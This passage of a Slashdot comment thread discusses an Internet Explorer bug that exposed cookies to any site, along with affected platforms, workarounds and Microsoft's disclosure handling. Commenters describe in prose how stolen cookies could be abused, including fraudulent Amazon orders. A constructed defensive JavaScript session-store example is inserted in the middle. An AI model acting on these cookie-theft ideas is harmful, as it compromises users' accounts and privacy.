    Microsoft security is to be made fun of by people looking for problems and reporting them.

    And ridiculous implications that they were aware of such a hole and were using it for evil purposes just show that we can't take any kind of commentary from Jamie seriously; what is M$ bashing FUD and what is a valid opinion?

    1. Re:ok, differentiate for me by Tower · · Score: 1

      I've reported a couple of security issues to M$ in the past, but they decided to ignore them... one got fixed months later after a larger client had problems due to this exposure, and got rather upset. Slow reaction time is a big key... We can fix linux, and people listen when you find things...

      --
      "It's tough to be bilingual when you get hit in the head."
  169. i'm impressed by Frederic54 · · Score: 1

    i tried it on my win95 machine, it works... i'll try on BeOS and QNX... the script tests if you have IE, so i cannot test it with BeOS/QNX, shit!
    --
    BeDevId 15453 - Download BeOS R5 Lite free!

    --
    "Science will win because it works." - Stephen Hawking
  170. An Interesting Example of Bad Security by General_Corto · · Score: 1

    And it's not without reason that I wrote that with a capital B.S. :)

    Slightly more seriously though, it's interesting to see how many bugs and glitches are coming out of Microsoft these days, and how they're affecting our daily lives (well, the majority of PC users' lives anyways). Perhaps more interesting than this is the proof that bugs like these give us that scripting languages can be *extremely* powerful things.

    I'm working on a system which embeds JavaScript (courtesy of Rhino - go Mozilla!) into something akin to an operating environment. As a result of the fact that XML and DOM are also very heavily involved, it is possible to control just about everything through scripting. This could be a huge security hole if I wanted it to be. However, Microsoft, in their wisdom, have driven a path through the minefield on my behalf, so all I have to do is tread more lightly than that behemoth.

    All I can say is 'thanks!'

    (BTW, I'm currently using IE5. Oh, the irony.)

  171. UNIX _IS_ affected by bjb · · Score: 5
    I don't know how well the tests were performed, but I just tried the test with IE 5 for Solaris and saw my cookie in all its glory.

    Hmm.. I only have IE for Solaris installed on this box for just such occasions.

    --

    --
    Never hit your grandmother with a shovel, for it leaves a bad impression on her mind...
  172. Microsoft Bugs: Not Just For Windows Anymore by uncleFester · · Score: 1

    This bug also appears to work well if one uses Internet Explorer on HP-UX[0]. I'd say more but I'm highly ashamed as it is. If anyone actually uses this on HP or Solaris (or Mac?) you may want to check the referred-to test pages and see what nifty little tidbits appear before you.

    [0] ok, I just wanted to see how badly IExplorer sucked on unix platforms. It's really quite entertaining.

    --
    -'fester
  173. Re:Look at this ridiculous Microsoft response! by Marc+Slemko · · Score: 1

    Wake up and smell the cookies. Although not entirely technically accurate or complete (because you could never get such a thing past a typical reporter), he is bang on.

    Yes, they have a big bug. However, name a site, any site, that makes significant use of cookies and I can almost guarantee you that you can steal cookies for that site using "cross site scripting". And that isn't going away.

    It is _CRITICAL_ that sites properly manage their use of cookies to minimize the problems from people stealing cookies in whatever manner. That is the message that needs to be coming out here because that is the _ONLY_ thing that can reduce the risk for users in the long term.
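Added example, not part of the thread and not any site's real code: one way a site can limit what a copied cookie is worth, which is the point of the comment above and of mr_death's 1-click test. The cookie only identifies a server-side session, and sensitive actions need a recent password check. Session ids, action names and time limits are constructed assumptions.

```javascript
// Constructed example: ids, users, actions and time limits are placeholders.
const SESSION_TTL_MS = 12 * 60 * 60 * 1000; // how long the cookie is honoured
const STEP_UP_WINDOW_MS = 10 * 60 * 1000;   // how fresh a password check must be
const SENSITIVE = new Set(["purchase", "change_address", "change_password"]);

class SessionStore {
  constructor() {
    this.sessions = new Map(); // cookie value (session id) -> server-side record
  }

  // Call after a successful password login. A real id must be long and random.
  create(id, user, now) {
    this.sessions.set(id, { user, created: now, lastPasswordAuth: now });
  }

  // Call when the user re-enters the password; passwordOk is the caller's verdict.
  reauthenticate(id, passwordOk, now) {
    const s = this.sessions.get(id);
    if (!s || !passwordOk) return false;
    s.lastPasswordAuth = now;
    return true;
  }

  // Decide what the holder of this cookie may do right now.
  authorize(id, action, now) {
    const s = this.sessions.get(id);
    if (!s) return "login_required";
    if (now - s.created > SESSION_TTL_MS) {
      this.sessions.delete(id); // expired: the cookie is worthless from here on
      return "login_required";
    }
    if (SENSITIVE.has(action) && now - s.lastPasswordAuth > STEP_UP_WINDOW_MS) {
      return "password_required";
    }
    return "allowed";
  }
}

// The replay from the thread: the cookie is presented again an hour after login.
function replayOutcome() {
  const HOUR = 60 * 60 * 1000;
  const store = new SessionStore();
  store.create("sid-constructed-0001", "alice", 0);
  return {
    browse: store.authorize("sid-constructed-0001", "view_cart", HOUR),
    buy: store.authorize("sid-constructed-0001", "purchase", HOUR),
  };
}

console.log(replayOutcome());
```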

  174. IDcide fix? by CapnMatt · · Score: 1

    I noticed that when running IDcide w/ IE that the bug wouldn't work. I tested it on and off, and it seems to protect against the bug.

    If you don't want to turn off javascript, try using IDcide. This is the sort of thing I think it was made for.

    --
    --- Cum catapultae proscriptae erunt tum soli proscripti catapultas habebunt
    1. Re:IDcide fix? by bob|hm · · Score: 1

      I'm seeing the same thing. I'm running 2000 pro w/ IE 5. Turning IDcide on or off didn't matter.. either way the script wasn't pulling up any of my cookies.

  175. Asking for Trouble by Master+Bait · · Score: 2
    Now you've done it. First you refused to remove posts harmful to Microsoft's reputation and now you're exposing Microsoft trade secrets!

    Is this Slashdot slowdown just a coincidence? I think not. Slashdot is now the victim of an official Microsoft Denial of Service Attack.

    Slashdot has crossed the line and is hurting our American Company's Freedom to Innovate.

    Also, this temporary Explorer snafu makes it quite clear that Microsoft doesn't steal everything from open source!

    blessings,
    Master Bait

    --
    "Only in their dreams can men truly be free 'twas always thus, and always thus will be."
    --Tom Schulman
  176. Or.... by eh? · · Score: 1

    the solution is to keep cookies disabled.... oh gee I forgot, according to slashdot cookies are good, beneficial things, and cannot be used for malicious purposes ;)

  177. Is this really a threat? by sonnerbob · · Score: 2
    And here I am trying to dampen paranoia about cookies. (I love the Slashdot FAQ on cookies.)

    But this bothers me and sounds similar to the bug reported at CookieCentral a long time ago. I'm trying to digest how this is different and what danger (and likelihood of appearance) this represents "in the wild".

    Answers here or to me by email would be appreciated.

  178. But what about passwords? by invenustus · · Score: 1

    Yahoo! keeps my password on their site in a cookie. Now any site can obtain my Yahoo! password and read my Yahoo! email. I don't want others reading my email. Do I sound like a paranoid kook for this?

    --
    grep -ri 'should work' /usr/src/linux | wc -l
  179. More on MS Exploits by KiboMaster · · Score: 1
    I've known about this for quite a while. Reading cookies isn't the only thing you can do through IE. With a simple Active X script I can read/write to your hard drive. I've also seen scripts that allow a malicious person to start any program through the browser.

    I'm not ragging on MS here, they aren't the only ones with exploits. Check out this link to security bugware. Exploits and fixes for all major operating systems.

    Protect yourself: make sure you have the latest patches to Windows 98. I'm sure you can find the links to other windows versions as well.

    <Insert Linux Plug Here>
    Of course the ultimate fix would be to install Linux, but I know I'm not the only one on slashdot who's preaching Linux, so I'll let people decide for themselves.
    </Insert Linux Plug Here>

    --

    "Happiness in intelligent people is the rarest thing I know."
    -- Ernest Hemingway

  180. Has Peacefire reported this to MS? by RayChuang · · Score: 3

    If the folks at Peacefire did not report these problems to Microsoft's Security team, then they are essentially doing a major disservice to the public.

    Hopefully, they do know Microsoft's address for reporting security issues: secure@microsoft.com. That address is monitored 24 hours a day and the MS security folks will try to replicate the problem ASAP.

    --
    Raymond in Mountain View, CA
    1. Re:Has Peacefire reported this to MS? by Marc+Slemko · · Score: 2

      I have no idea what they did. I know that _I_ reported a very similar issue (possibly due to the same root problem) with the exact same consequences to Microsoft two months ago and they have not yet released a fix.

      Sure, I got a quick response saying they were looking into it. Sure, they said they had developed a patch. But releasing it? Well... that didn't quite happen. It is true that I did not pressure them on it since I was busy with more important things, but I shouldn't have to.

  181. fun with Amazon's One-Click Shopping (tm) by anonymous+cowerd · · Score: 3

    Fun with Amazon's One-Click Shopping, or "you mean you didn't order five hundred copies of Joy of Preteen Sex?"

    Doesn't Amazon's proprietary exclusive patented HANDS OFF IT'S OURS AND YOU CAN'T HAVE IT One-Click Shopping system use cookies to save buyers those arduous extra clicks? And doesn't this mean that someone using this exploit can then get your personal buyer's information? ("Your," not "my", at least until Amazon stops suing people right and left.)

    Gee, I guess it's a good thing that Amazon has defended their patent so vigorously, or else customers of other companies would be equally at risk.

    By the way, this is off-topic, but I figure readers would be amused. Who is to blame for the "ILOVEYOU" worm? Those funloving Filipino folks who wrote it? Microsoft, for making their scripting language so insecure and so easy to subvert? Why no. According to those geniuses in Congress, the $15-billion dollars in damages (I wonder why they didn't say "$15-trillion" or "$15-quadrillion" as long as they were pulling numbers out of thin air) are due to the slackness and irresponsibility of McAfee, the anti-virus vendor. I've got to be kidding, right? Well, check it out.

    Yours WDK - WKiernan@concentric.net

  182. IE for Unix? by slickwillie · · Score: 1

    The story says IE for Mac and IE for Unix are not vulnerable. Since when is there IE for Unix? Which Unix? Next thing you know there will be IE for Linux.

  183. And if Peacefire didn't report it to MS, then ... by WillAffleck · · Score: 1

    MSFT will sue them. Hey, if they can sue slashot, they can sue anyone.

    --
    Will in Seattle
  184. Re:uh, I think yes by ryanr · · Score: 2

    Of course, you can place the orders using your Amazon Affiliate Site, giving yourself a small percentage. But I think that would make it a tad too obvious as to who the culprit was. Unless it was your friend's store. :)

  185. oh give me a break by SEAL · · Score: 2
    Turning off Javascript or disabling stored cookies is an acceptable temporary solution to the problem.

    If a security hole is found that can't be worked around, then yes, wait for a patch. Same thing you would do with Netscape.

    Both Netscape and Microsoft IE have had security problems but Slashdot holds Microsoft to a different standard.

    Witness an OLD OLD bug:

    http://www.ciac.org/ciac/bulletins/i-040.shtml

    Sounds familiar, doesn't it? What happened? It got fixed. And this certainly is not the only Netscape bug that has ever surfaced.

    Security problems are going to be discovered. Humans make mistakes. The key is to respond to the problems swiftly, and try not to rush products out the door without proper testing. I think both MS and Netscape were guilty of the latter for a long time.

    Best regards,

    SEAL

  186. thank God for the freedom to innovate by criticalrealist · · Score: 1

    Otherwise we'd never have such features.

    --
    I am not a lawyer.
  187. 2000 is affected by robwicks · · Score: 1

    I saw my cookie when I tried it with IE that comes with 2000. Of course, that only happened because I rebuilt the machine and forgot to reset my Internet settings. I normally don't allow cookies or scripting unless I specifically authorize the site to do so.

    --

    Logic ... merely enables one to be wrong with authority. -- Doctor Who

  188. It's all DOJ's fault by TopShelf · · Score: 1
    If the Justice Department hadn't been bugging MS for the last few years, they would control the entire Internet by now, thus there would be no "hostile" users left.

    All Hail the Great Leader!

    --
    Stop by my site where I write about ERP systems & more
  189. easy fix by tinus · · Score: 1

    You can always install a proxy, as the typical proxy doesn't understand these URLs either. They try to resolve www.blah.com%2fpage.html and that won't work, so they return an error. No need to filter things...

  190. Happens on W2K as well by michael.creasy · · Score: 1

    Will test with IE5.5 as well soon.

    My Webcam